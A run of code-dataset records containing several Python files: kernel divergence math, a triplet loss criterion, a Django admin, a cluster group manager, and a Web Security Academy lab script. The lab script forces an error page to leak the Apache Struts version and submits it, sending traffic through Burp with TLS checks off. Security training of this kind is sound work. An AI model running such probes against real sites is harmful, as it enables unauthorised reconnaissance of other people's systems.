"usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 87, "usage_type": 
"call"}, {"api_name": "numpy.linalg", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 104, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 112, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 127, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 132, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.argpartition", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 167, "usage_type": "call"}]} +{"seq_id": "9922483230", "text": "import numpy as np\nimport scipy.stats as scs\nimport kernels as kl\n\n\n######## MMD ##########\n\ndef MMD(x,y,k):\n n = len(x)\n Kxx = np.array([[k(x[i],x[j]) for i in range(n)] for j in range(n)])\n Kyy = np.array([[k(y[i],y[j]) for i in range(n)] for j in range(n)])\n Kxy = np.array([[k(x[i],y[j]) for i in range(n)] for j in range(n)])\n A = 1/((n-1)*n) * (np.sum(Kxx) - np.sum(np.diag(Kxx)))\n C = 1/((n-1)*n) * (np.sum(Kyy) - np.sum(np.diag(Kyy)))\n B = 1/n**2* np.sum(Kxy)\n return A - B + C\n\n\n#gradient in x of MMD \ndef grad_MMD(x,y,k,dk):\n d = len(x[0])\n n = len(x)\n m = len(y)\n dKx = np.array([[dk(x[i],x[j]) for j in range(n)] for i in range(n)])\n dKx[:,:,0] = dKx[:,:,0] - np.diag(np.diag(dKx[:,:,0]))\n dKx[:,:,1] = dKx[:,:,1] - np.diag(np.diag(dKx[:,:,1]))\n dKy = np.array([[dk(x[i],y[j]) for j in range(m)] for i in range(n)])\n R = np.zeros((n,d))\n R[:,0] = 2/(n * (n-1)) * dKx[:,:,0] @ np.ones(n) - 2/m**2 * dKy[:,:,0] @ np.ones(m)\n R[:,1] = 2/(n * (n-1)) * dKx[:,:,1] @ np.ones(n) - 2/m**2 * dKy[:,:,1] @ np.ones(m)\n return R\n\n\n\ndef log_ou_0(t):\n t_log = np.zeros(len(t))\n for i in range(len(t)):\n if t[i] > 0:\n t_log[i] = np.log(t[i])\n return t_log\n\n\n\n\n####### KKL ########\n\n\ndef KKL(x,y,k,Packy):\n n = len(x)\n m = len(y)\n Kx = 1/n * np.array([[k(x[i],x[j]) for i in range(n)] for j in range(n)])\n Ky = Packy[0] #1/m * np.array([[k(y[i],y[j]) for i in range(m)] for j in range(m)])\n regx = 1e-9*np.eye(n)\n regy = 1e-9*np.eye(m)\n #Kx = Kx +regx\n #Ky = Ky+regy\n Lx,U = np.linalg.eig(Kx)\n U = np.real(U).transpose()\n Lx = np.real(Lx)\n Ly,V = Packy[1], Packy[2] #np.linalg.eig(Ky)\n #V = np.real(V).transpose()\n #Ly = np.real(Ly)\n Trxy = 0\n Kxy = np.array([[k(x[i],y[j]) for j in range(m)] for i in range(n)])\n Trxx = np.sum(Lx * log_ou_0(Lx))\n for s in range(n):\n for t in range(m):\n Trxy = Trxy + log_ou_0([Ly[t]])[0] / Ly[t] * (U[s] @ Kxy @ V[t])**2 \n Trxx = np.sum(Lx * log_ou_0(Lx))\n \n return Trxx - 1/(n*m) * Trxy\n\n#Wasserstein Gradient of KKL\ndef WGrad_KKL(w,x,y,k,dk,Packy):\n n = len(x)\n m = len(y)\n Kx = 1/n * np.array([[k(x[i],x[j]) for i in range(n)] for j in range(n)])\n Ky = Packy[0] #1/m * np.array([[k(y[i],y[j]) for i in range(m)] for j in range(m)])\n Lx,U = np.linalg.eig(Kx)\n U = U.transpose()\n Lx = np.real(Lx)\n Ly,V = Packy[1], Packy[2] #np.linalg.eig(Ky)\n #V = V.transpose()\n #Ly = 
np.real(Ly)\n Kwx = np.array([k(w,x[i]) for i in range(n)]).transpose()\n Kwy = np.array([k(w,y[j]) for j in range(m)]).transpose()\n DKx = np.array([dk(w,x[i]) for i in range(n)]).transpose()\n DKy = np.array([dk(w,y[j]) for j in range(m)]).transpose()\n Trwx = 0\n Trwy = 0 \n for s in range(n):\n Trwx = Trwx + log_ou_0([Lx[s]])[0] / Lx[s] * 2 * (U[s] @ Kwx)* (DKx @ U[s]) \n #print(U[s] @ (n * Kx) @ U[s])\n for t in range(m):\n Trwy = Trwy + log_ou_0([Ly[t]])[0] / Ly[t] * 2 * (V[t] @ Kwy)* (DKy @ V[t]) \n return 1/n * Trwx - 1/ m * Trwy\n \n \n \n \n\n\n######## Kernel density estimation ###############\n\n#base distribution sample\nx_tau = scs.multivariate_normal.rvs(np.zeros(2),np.identity(2),100) \n\n\ndef h(x,y,k):\n return np.mean(np.array([k(x,x_tau[i]) * k(y,x_tau[i]) * np.exp(np.linalg.norm(x_tau[i])) /(np.sqrt(2 * np.pi)) for i in range(len(x_tau))]))\n \n \n\ndef DE(x,k,y):\n n = len(x)\n return 1/n * np.sum(np.array([h(x[i],y,k) for i in range(n)]))\n\ndef KDE(x, y, k):\n n = len(x)\n Q = np.array([DE(x,k,x[i]) for i in range(n)])\n P = np.array([DE(y,k,x[i]) for i in range(n)])\n return 1/n * np.sum(np.log(Q) * Q - np.log(P) * Q)\n \n \n \n######### TRACE #######################\n\ndef K_trace(x,k):\n n = len(x)\n Kx = 1/n * np.array([[k(x[i],x[j]) for i in range(n)] for j in range(n)])\n Lambdx,_ = np.linalg.eig(Kx)\n return np.sum(Lambdx)\n \n\n\n", "repo_name": "cclementine25/KKL_div", "sub_path": "divergences.py", "file_name": "divergences.py", "file_ext": "py", "file_size_in_byte": 3976, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.real", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.array", 
"line_number": 77, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 79, "usage_type": "attribute"}, {"api_name": "numpy.real", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 88, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal.rvs", "line_number": 106, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 106, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 106, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "40398025849", "text": "# -*- coding: utf-8 -*-\n\nimport math\n\nimport torch\n\nfrom ncc.criterions import NccCriterion\nfrom ncc.data.constants import EPS\nfrom ncc.utils.logging import metrics\n\n\nclass TripletCriterion(NccCriterion):\n def __init__(self, task, sentence_avg):\n super().__init__(task)\n self.sentence_avg = sentence_avg\n self.margin = self.task.args['optimization']['margin']\n\n def forward(self, model, sample, reduce=True):\n \"\"\"Compute the loss for the given sample.\n\n Returns a tuple with three elements:\n 1) the loss\n 2) the sample size, which is used as the denominator for the gradient\n 3) logging outputs to display while training\n \"\"\"\n net_output = model(**sample['net_input'])\n loss, _ = self.compute_loss(model, net_output, reduce=reduce)\n sample_size = sample['target'].size(0) if self.sentence_avg else sample['ntokens']\n logging_output = {\n 'loss': loss.data,\n 'ntokens': sample_size,\n 'nsentences': sample_size,\n 'sample_size': sample_size,\n }\n return loss, sample_size, logging_output\n\n def compute_loss(self, repr, equal_ids):\n distance = torch.norm(repr.unsqueeze(dim=0) - repr.unsqueeze(dim=1), dim=-1, p=1) # B x B\n max_pos_distance = (distance * equal_ids).max(dim=-1)[0]\n neg_filter = distance <= (max_pos_distance + self.margin).unsqueeze(dim=-1)\n pos_mask = equal_ids + 
torch.eye(*equal_ids.size()).type_as(distance)\n neg_filter = neg_filter * (1 - pos_mask)\n avg_neg_distance = (distance * neg_filter).sum(dim=-1) / (neg_filter.sum(dim=-1) + EPS)\n min_neg_distance = (distance + pos_mask * 99999).min(dim=-1)[0]\n pos_filter = (distance >= (min_neg_distance - self.margin).unsqueeze(dim=-1)).type_as(distance)\n pos_filter = pos_filter * equal_ids\n avg_pos_distance = (distance * pos_filter).sum(dim=-1) / (pos_filter.sum(dim=-1) + EPS)\n triplet_loss = 0.5 * torch.relu(avg_pos_distance - min_neg_distance + self.margin) + \\\n 0.5 * torch.relu(max_pos_distance - avg_neg_distance + self.margin)\n triplet_loss = triplet_loss.sum()\n return triplet_loss, None\n\n @staticmethod\n def reduce_metrics(logging_outputs) -> None:\n \"\"\"Aggregate logging outputs from data parallel training.\"\"\"\n loss_sum = sum(log.get('loss', 0) for log in logging_outputs)\n # ntokens = sum(log.get('ntokens', 0) for log in logging_outputs)\n sample_size = sum(log.get('sample_size', 0) for log in logging_outputs)\n metrics.log_scalar('loss', loss_sum / sample_size / math.log(2), sample_size, round=3)\n\n @staticmethod\n def logging_outputs_can_be_summed() -> bool:\n \"\"\"\n Whether the logging outputs returned by `forward` can be summed\n across workers prior to calling `reduce_metrics`. Setting this\n to True will improves distributed training speed.\n \"\"\"\n return True\n", "repo_name": "CGCL-codes/naturalcc", "sub_path": "ncc/criterions/type_prediction/_triplet.py", "file_name": "_triplet.py", "file_ext": "py", "file_size_in_byte": 3002, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 220, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ncc.criterions.NccCriterion", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.norm", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 41, "usage_type": "call"}, {"api_name": "ncc.data.constants.EPS", "line_number": 43, "usage_type": "name"}, {"api_name": "ncc.data.constants.EPS", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.relu", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.relu", "line_number": 49, "usage_type": "call"}, {"api_name": "ncc.utils.logging.metrics.log_scalar", "line_number": 59, "usage_type": "call"}, {"api_name": "ncc.utils.logging.metrics", "line_number": 59, "usage_type": "name"}, {"api_name": "math.log", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "74549878889", "text": "from django.contrib import admin\nfrom django.utils.html import mark_safe\nfrom . 
import models\n\n\n@admin.register(models.RoomType, models.Facility, models.HouseRule, models.Amenity)\nclass ItemAdmin(admin.ModelAdmin):\n\n \"\"\" item Admin Definition \"\"\"\n\n list_display = (\"name\", \"used_by\")\n\n def used_by(self, obj):\n return obj.rooms.count()\n\n\n# https://docs.djangoproject.com/en/3.0/ref/contrib/admin/#django.contrib.admin.TabularInline\nclass PhotoInLine(admin.TabularInline):\n model = models.Photo\n\n\n# ↑ 와 같음 보이는방식이 다름\n# class PhotoInLine(admin.StackedInline):\n# model = models.Photo\n\n\n@admin.register(models.Room)\nclass RoomAdmin(admin.ModelAdmin):\n\n \"\"\" Room Admin Definition \"\"\"\n\n inlines = [\n PhotoInLine,\n ]\n\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/#django.contrib.admin.ModelAdmin.fieldsets\n fieldsets = (\n (\n \"Basic Info\",\n {\"fields\": (\"name\", \"description\", \"country\", \"city\", \"address\", \"price\")},\n ),\n (\"Times\", {\"fields\": (\"check_in\", \"check_out\", \"instant_book\",)},),\n (\"Spaces\", {\"fields\": (\"guests\", \"beds\", \"bedrooms\", \"baths\",)}),\n (\n \"More About the Space\",\n {\n \"classes\": (\"collapse\",),\n \"fields\": (\"amenities\", \"facilitys\", \"houserules\",),\n },\n ),\n (\"Last Details\", {\"fields\": (\"host\",)}),\n )\n\n ordering = (\"name\", \"price\", \"bedrooms\")\n\n list_display = (\n \"name\",\n \"country\",\n \"city\",\n \"price\",\n \"guests\",\n \"beds\",\n \"bedrooms\",\n \"baths\",\n \"check_in\",\n \"check_out\",\n \"instant_book\",\n \"count_amenities\",\n \"count_photos\",\n \"total_rating\",\n \"created\",\n )\n\n list_filter = (\n \"instant_book\",\n \"host__superhost\",\n \"room_type\",\n \"amenities\",\n \"facilitys\",\n \"houserules\",\n \"city\",\n \"country\",\n )\n\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/\n # ^ , = , @ 설명이 나와있음\n search_fields = (\"^city\", \"^host__username\")\n\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/\n # ManyToManyField 에만 적용가능\n filter_horizontal = (\n \"amenities\",\n \"facilitys\",\n \"houserules\",\n )\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/#django.contrib.admin.ModelAdmin.raw_id_fields\n raw_id_fields = (\"host\",)\n\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/\n\n def save_model(self, request, obj, form, change):\n print(obj, form, change)\n super().save_model(request, obj, form, change)\n\n # obj == row\n def count_amenities(self, obj):\n return obj.amenities.count()\n\n def count_photos(self, obj):\n return obj.photos.count()\n\n def superuser(self, obj):\n return obj.host.superhost\n\n # 해당하는 column name 변경\n # count_amenities.short_description = \"hello sexy!\"\n count_photos.short_description = \"Photo_Count\"\n\n\n@admin.register(models.Photo)\nclass PhotoAdmin(admin.ModelAdmin):\n\n \"\"\" Photo Admin Difinition \"\"\"\n\n list_display = (\"__str__\", \"get_thumnail\")\n\n def get_thumnail(self, obj):\n # print(dir(obj.file))\n\n # mark_safe : django 의 각종 security 때문에 웹사이트가 javascript ,html 등\n # 각종 명령어를 읽지 못하게 막아놓은것을 풀어줌\n # ( django 에게 안전한 String 인것을 알림 )\n return mark_safe(f'')\n\n get_thumnail.short_description = \"Thumnail\"\n\n", "repo_name": "gygy2006/airbnb-clone", "sub_path": "rooms/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 3663, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", 
"line_number": 7, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 6, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.contrib.admin.TabularInline", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 18, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 28, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 27, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 121, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 121, "usage_type": "name"}, {"api_name": "django.utils.html.mark_safe", "line_number": 133, "usage_type": "call"}, {"api_name": "django.contrib.admin.register", "line_number": 120, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 120, "usage_type": "name"}]} +{"seq_id": "8811037141", "text": "# Information disclosure in error messages\n\nimport sys\nimport requests\nimport urllib3\nimport urllib.parse\nimport re\nimport time\nimport warnings\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nproxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n\n##########################################################\n#\tFUNCTIONS\n##########################################################\n\ndef get_version(s, url):\n\tprint('\\n[+] Trying to produce an error passing a non-integer value to productId parameter...')\n\tpath = url + '/product?productId=\"gwyo\"'\n\tprint(path)\n\tr = s.get(path)\n\ttime.sleep(1)\n\tprint(r.text)\n\tframework = r.text.encode().split(b'\\n\\n')[1].decode()\n\tprint('\\n[+] Found Framework version:\\t\\t%s' % framework)\n\ttime.sleep(1)\n\tversion = framework.replace('Apache Struts ', '')\n\treturn version\n\ndef submit_version(s, url, version):\n\tprint('[+] Trying to submit the version to solve the lab...')\n\tsubmit_path = url + '/submitSolution'\n\tsubmit_data = {\"answer\": version}\n\tr = s.post(submit_path, data=submit_data)\n\ttime.sleep(1)\n\treturn r\n\ndef show_usage():\n\tprint('[+] Usage: %s ' % sys.argv[0])\n\tprint('[+] Example: %s https://www.target.com' % sys.argv[0])\n\tsys.exit(-1)\n\n##########################################################\n#\tMAIN\n##########################################################\n\ndef main():\n\tprint('[+] Lab: Information disclosure in error messages')\n\ttry:\n\t\turl = sys.argv[1].strip()\n\texcept IndexError:\n\t\tshow_usage()\n\ts = requests.Session()\n\ts.proxies = proxies\t\t# Comment this line to disable proxying\n\ts.verify = False\n\ttry:\n\t\tr = s.get(url, allow_redirects=False)\n\t\ttime.sleep(1)\n\t\tif '
Error
' in r.text or 'Server Error: Gateway Timeout' in r.text:\n\t\t\tprint('\\n[-] HOST seems to be down ')\n\t\t\tsys.exit(-1)\n\t\telse:\n\t\t\tprint('[+] Trying to retrieve the number version of the framework...\\n')\n\t\t\ttime.sleep(1)\n\t\t\tparsed_url = urllib.parse.urlparse(url)\n\t\t\thost = parsed_url.netloc\n\t\t\tif parsed_url.port:\n\t\t\t\tport = parsed_url.port\n\t\t\telif parsed_url.scheme == \"https\":\n\t\t\t\tport = 443\n\t\t\telif parsed_url.scheme == \"http\":\n\t\t\t\tport = 80\n\t\t\tprint(parsed_url)\n\t\t\turl = parsed_url.scheme + '://' + host\n\t\t\tversion = get_version(s, url)\n\t\t\tr = submit_version(s, url, version)\n\t\t\ts.cookies.clear()\n\t\t\ttime.sleep(2)\n\t\t\tr = s.get(url)\n\t\t\tif 'Congratulations, you solved the lab!' in r.text:\n\t\t\t\tprint('\\n[+] The lab is solved !')\n\texcept requests.exceptions.ProxyError:\n\t\tprint('[-] PROXY seems to be missconfigured ')\n\texcept KeyboardInterrupt:\n\t\tsys.exit(0)\n\nif __name__ == \"__main__\":\n\tmain()\n", "repo_name": "gwyomarch/WebSecurityAcademy", "sub_path": "InformationDisclosure/exploit-lab01.py", "file_name": "exploit-lab01.py", "file_ext": "py", "file_size_in_byte": 2644, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.filterwarnings", "line_number": 11, "usage_type": "call"}, {"api_name": "urllib3.disable_warnings", "line_number": 12, "usage_type": "call"}, {"api_name": "urllib3.exceptions", "line_number": 12, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 29, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 42, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 53, "usage_type": "attribute"}, {"api_name": "requests.Session", "line_number": 56, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 61, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 64, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 67, "usage_type": "call"}, {"api_name": "urllib.parse.parse.urlparse", "line_number": 68, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 68, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 68, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 81, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 85, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "41494343522", "text": "__author__ = 'Sumit Sharma'\n__copyright__ = 'Copyright 2022, Luna2 Project'\n__license__ = 'GPL'\n__version__ = '2.0'\n__maintainer__ = 'Sumit Sharma'\n__email__ = 'sumit.sharma@clustervision.com'\n__status__ = 'Development'\n\nfrom base64 import b64encode\nfrom concurrent.futures import ThreadPoolExecutor\nfrom utils.database import Database\nfrom utils.log import Log\nfrom utils.config import Config\nfrom utils.queue import Queue\nfrom utils.helper import Helper\nfrom common.constant import CONSTANT\n\n\nclass Group():\n \"\"\"\n This class is responsible for all operations on groups.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n This constructor will initialize all required variables here.\n \"\"\"\n self.logger = 
Log.get_logger()\n self.plugins_path=CONSTANT[\"PLUGINS\"][\"PLUGINS_DIR\"]\n\n\n def get_all_group(self):\n \"\"\"\n This method will return all the groups in detailed format.\n \"\"\"\n groups = Database().get_record(None, 'group', None)\n if groups:\n response = {'config': {'group': {} }}\n for group in groups:\n name = group['name']\n group_id = group['id']\n group_interface = Database().get_record_join(\n ['groupinterface.interface','network.name as network','groupinterface.options'],\n ['network.id=groupinterface.networkid'],\n [f\"groupid = '{group_id}'\"]\n )\n if group_interface:\n group['interfaces'] = []\n for interface in group_interface:\n interface['options'] = interface['options'] or \"\"\n group['interfaces'].append(interface)\n del group['id']\n group['setupbmc'] = Helper().make_bool(group['setupbmc'])\n group['netboot'] = Helper().make_bool(group['netboot'])\n group['localinstall'] = Helper().make_bool(group['localinstall'])\n group['bootmenu'] = Helper().make_bool(group['bootmenu'])\n group['osimage'] = Database().name_by_id('osimage', group['osimageid'])\n del group['osimageid']\n if group['bmcsetupid']:\n group['bmcsetupname'] = Database().name_by_id('bmcsetup', group['bmcsetupid'])\n del group['bmcsetupid']\n response['config']['group'][name] = group\n self.logger.info('Provided list of all groups with details.')\n else:\n self.logger.error('No group is available.')\n response = 'No group is available'\n return False, response\n return True,response\n\n\n def get_group(self, name=None):\n \"\"\"\n This method will return requested group in detailed format.\n \"\"\"\n # things we have to set for a group\n items = {\n # 'prescript': '',\n # 'partscript': '',\n # 'postscript': '',\n 'setupbmc':False,\n 'netboot':False,\n 'localinstall':False,\n 'bootmenu':False,\n 'provision_interface':'BOOTIF',\n 'provision_method': 'torrent',\n 'provision_fallback': 'http'\n }\n # same as above but now specifically base64\n b64items = {'prescript': '', 'partscript': '', 'postscript': ''}\n cluster = Database().get_record(None, 'cluster', None)\n groups = Database().get_record(None, 'group', f' WHERE name = \"{name}\"')\n if groups:\n response = {'config': {'group': {} }}\n group = groups[0]\n group_id = group['id']\n group_interface = Database().get_record_join(\n [\n 'groupinterface.interface',\n 'network.name as network',\n 'groupinterface.options'\n ],\n ['network.id=groupinterface.networkid'],\n [f\"groupid = '{group_id}'\"]\n )\n if group_interface:\n group['interfaces'] = []\n for interface in group_interface:\n if not interface['options']:\n del interface['options']\n group['interfaces'].append(interface)\n del group['id']\n for key, value in items.items():\n if key in cluster[0] and ((not key in group) or (not group[key])):\n if isinstance(value, bool):\n cluster[0][key] = str(Helper().make_bool(cluster[0][key]))\n group[key] = str(cluster[0][key])\n group[key+'_source'] = 'cluster'\n elif key in group and group[key]:\n if isinstance(value, bool):\n group[key] = str(Helper().make_bool(group[key]))\n group[key+'_source'] = 'group'\n group[key] = group[key] or str(value)\n else:\n group[key] = str(value)\n group[key+'_source'] = 'default'\n try:\n for key, value in b64items.items():\n default_str = str(value)\n default_data = b64encode(default_str.encode())\n default_data = default_data.decode(\"ascii\")\n if key in group and group[key]:\n group[key] = group[key] or default_data\n group[key+'_source'] = 'group'\n else:\n group[key] = default_data\n group[key+'_source'] = 
'default'\n except Exception as exp:\n self.logger.error(f\"{exp}\")\n\n group['osimage'] = Database().name_by_id('osimage', group['osimageid'])\n del group['osimageid']\n if group['bmcsetupid']:\n group['bmcsetupname'] = Database().name_by_id('bmcsetup', group['bmcsetupid'])\n del group['bmcsetupid']\n # ---\n if group['osimagetagid']:\n group['osimagetag'] = Database().name_by_id('osimagetag', group['osimagetagid']) or 'default'\n else:\n group['osimagetag'] = 'default'\n del group['osimagetagid']\n group['osimage_source'] = 'group'\n group['bmcsetupname_source'] = 'group'\n group['osimagetag_source'] = 'group'\n if group['osimagetag'] == 'default':\n group['osimagetag_source'] = 'default'\n # ---\n response['config']['group'][name] = group\n self.logger.info(f'Returned Group {name} with Details.')\n else:\n self.logger.error('No group is available.')\n response = 'No group is available'\n return False,response\n return True,response\n\n\n def get_group_member(self, name=None):\n \"\"\"\n This method will return all the list of all the member node names for a group.\n \"\"\"\n status=False\n groups = Database().get_record(None, 'group', f' WHERE name = \"{name}\"')\n if groups:\n group = groups[0]\n groupid = group['id']\n response = {'config': {'group': {name: {'members': []}} }}\n node_list = Database().get_record(None, 'node', f' WHERE groupid = \"{groupid}\"')\n if node_list:\n nodes = []\n for node in node_list:\n nodes.append(node['name'])\n response['config']['group'][name]['members'] = nodes\n self.logger.info(f'Provided all group member nodes {nodes}.')\n status=True\n else:\n self.logger.error(f'Group {name} is not have any member node.')\n response = f'Group {name} is not have any member node'\n status=False\n else:\n self.logger.error(f'Group {name} is not available.')\n response = f'Group {name} is not available'\n status=False\n return status, response\n\n\n def update_group(self, name=None, request_data=None):\n \"\"\"\n This method will create or update a group.\n \"\"\"\n data = {}\n status=False\n response=\"Internal error\"\n # things we have to set for a group\n items = {\n 'prescript': '',\n 'partscript': 'bW91bnQgLXQgdG1wZnMgdG1wZnMgL3N5c3Jvb3QK',\n 'postscript': 'ZWNobyAndG1wZnMgLyB0bXBmcyBkZWZhdWx0cyAwIDAnID4+IC9zeXNyb290L2V0Yy9mc3RhYgo=',\n 'setupbmc': False,\n 'netboot': True,\n 'localinstall': False,\n 'bootmenu': False,\n 'provision_interface': 'BOOTIF'\n }\n create, update = False, False\n if request_data:\n data = request_data['config']['group'][name]\n oldgroupname = None\n group = Database().get_record(None, 'group', f' WHERE name = \"{name}\"')\n if group:\n group_id = group[0]['id']\n if 'newgroupname' in data:\n newgroupname = data['newgroupname']\n oldgroupname = name\n where = f' WHERE `name` = \"{newgroupname}\"'\n check_group = Database().get_record(None, 'group', where)\n if check_group:\n status=False\n return status, f'{newgroupname} Already present in database'\n else:\n data['name'] = data['newgroupname']\n del data['newgroupname']\n update = True\n else:\n if 'newgroupname' in data:\n status=False\n return status, 'Invalid request: newgroupname is not allowed while creating a new group'\n if 'interfaces' not in data:\n controller = Database().get_record_join(\n ['network.name as network'],\n ['ipaddress.tablerefid=controller.id','network.id=ipaddress.networkid'],\n ['tableref=\"controller\"', 'controller.hostname=\"controller\"']\n )\n data['interfaces']=[]\n if controller:\n data['interfaces'].append(\n {\n 'interface': 